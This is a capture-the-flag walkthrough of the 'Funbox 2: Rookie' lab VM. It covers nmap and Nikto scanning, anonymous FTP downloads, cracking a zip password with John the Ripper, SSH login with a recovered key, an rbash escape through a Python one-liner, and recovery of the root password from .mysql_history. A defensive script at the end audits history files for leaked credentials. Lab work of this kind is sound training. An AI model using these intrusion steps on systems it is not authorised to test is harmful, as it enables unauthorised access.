Funbox 2: Rookie

Easy, boot2root, Real life like

Last updated 4 years ago


There are 3 steps to get the root shell.

  1. Enumeration: nmap scan reveals service info

  2. Exploitation: password cracking and ssh

  3. Privilege Escalation: MySQL history file

Now let's go through the details of the process.

1. Enumeration

1) First I need the target's IP address, so I run netdiscover:

netdiscover -i eth0 -r 10.0.0.0/16

The target IP is 10.0.2.34.

2) Now I use nmap to scan all TCP ports for open ones:

nmap -Pn -p- -v 10.0.2.34

and the result is:

PORT STATE SERVICE 
21/tcp open ftp 
22/tcp open ssh 
80/tcp open http

3) For better enumeration, I now scan only those 3 ports, with version and OS detection:

nmap -sV -O -p 21,22,80 10.0.2.34

Now I have the version and OS details:

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

4) Web page shows the default Apache page

5) A Nikto scan reveals nothing of note except robots.txt:

+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5ab414e93acbc, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found. 

6) Nothing interesting in robots.txt

7) As there is nothing interesting on the web side, let's try FTP. Anonymous FTP login is allowed, so I list all the files, including hidden ones:

ftp 10.0.2.34

ftp> ls -a

drwxr-xr-x 2 ftp ftp 4096 Jul 25 11:07 .
drwxr-xr-x 2 ftp ftp 4096 Jul 25 11:07 ..
-rw-r--r-- 1 ftp ftp 153 Jul 25 11:06 .@admins
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:52 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:58 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 10:44 tom.zip
-rw-r--r-- 1 ftp ftp 114 Jul 25 11:07 .@users
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 zlatan.zip

8) I download all of these files recursively with wget:

wget -m ftp://anonymous:anonymous@10.0.2.34

9) .@users reveals some info:

cat .@users

and it says:

Hi Users, be careful with your keys. Find them in %yourname%.zip. The passwords are the old ones. Regards root

10) Those .zip files are password protected; unzip fails without the password.

2. Exploitation

11) Let's try fcrackzip to recover the zip password:

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' tom.zip

It fails and prints nothing.

12) Now I try John the Ripper. First I need to extract a crackable hash from the zip file:

zip2john tom.zip > tom.hash

With the hash extracted, I can run a dictionary attack.

13) I use rockyou.txt as the wordlist:

john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash

This recovers the password.

14) Now unzip the archive (unzip tom.zip); it contains id_rsa, an SSH private key.

15) Now change the permissions of id_rsa:

chmod +x id_rsa

16) Log in using this private key:

ssh -i id_rsa tom@10.0.2.34

This fails: ssh refuses to use a private key whose permissions are too open (it must not be readable by other users).

17) Now I change the private key permissions (chmod 600 id_rsa) and try ssh again. This time it succeeds.

3. Privilege Escalation

18) After login, I try some commands and find that the shell is rbash (restricted bash). The link below lists some useful ways to bypass the restriction.

LINK

19) Spawning a bash shell from Python escapes the restricted shell:

python3 -c 'import os; os.system("/bin/bash")'

20) I find a .mysql_history file and try to read it.

21) The history file reveals some info, but in an escaped form like this (the mysql client writes each space in a statement as the octal escape \040):

show\040databases;

quit

create\040database\040'support';

create\040database\040support;

so I replace the escapes with spaces to make it readable:

sed "s/\\\040/ /g" < .mysql_history

It reveals a password!

22) The root password is: xx11yy22!

Now I can log in as root:

sudo su

after changing directory (cd /root) I can read the root flag.
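The .mysql_history decoding from step 21 is the kind of thing an administrator should audit for before an attacker does. The following Python script is an added example (not part of the original walkthrough): it decodes the octal escapes the mysql client writes into the history file and flags statements that embed a clear-text password, so such credentials can be rotated and the file purged. The history contents and password values are constructed for the example.

```python
import re

# Constructed sample of a ~/.mysql_history file. The mysql client writes
# whitespace inside each statement as an octal escape (space -> \040).
SAMPLE_HISTORY = r"""show\040databases;
quit
create\040database\040support;
create\040user\040'support'@'localhost'\040identified\040by\040'Example-Pass-1';
set\040password\040for\040'root'@'localhost'\040=\040password('Example-Pass-2');
select\040*\040from\040support.tickets;
"""

# A backslash followed by exactly three octal digits, e.g. \040.
OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")

# SQL constructs that carry a clear-text secret inside the statement.
CREDENTIAL_PATTERNS = [
    re.compile(r"\bidentified\s+by\s+'([^']*)'", re.IGNORECASE),
    re.compile(r"\bpassword\s*\(\s*'([^']*)'\s*\)", re.IGNORECASE),
]


def decode_history_line(line: str) -> str:
    """Turn MySQL's \\ooo octal escapes back into the original characters."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), line)


def find_credentials(history_text: str) -> list:
    """Return (line_number, decoded_statement, secret) for every statement
    in the history text that embeds a password."""
    hits = []
    for lineno, raw in enumerate(history_text.splitlines(), start=1):
        stmt = decode_history_line(raw)
        for pattern in CREDENTIAL_PATTERNS:
            for match in pattern.finditer(stmt):
                hits.append((lineno, stmt, match.group(1)))
    return hits


if __name__ == "__main__":
    for lineno, stmt, secret in find_credentials(SAMPLE_HISTORY):
        print(f"line {lineno}: secret {secret!r} in: {stmt}")
```

Run it against a real history file with find_credentials(open(path).read()); a hit means the secret should be treated as exposed.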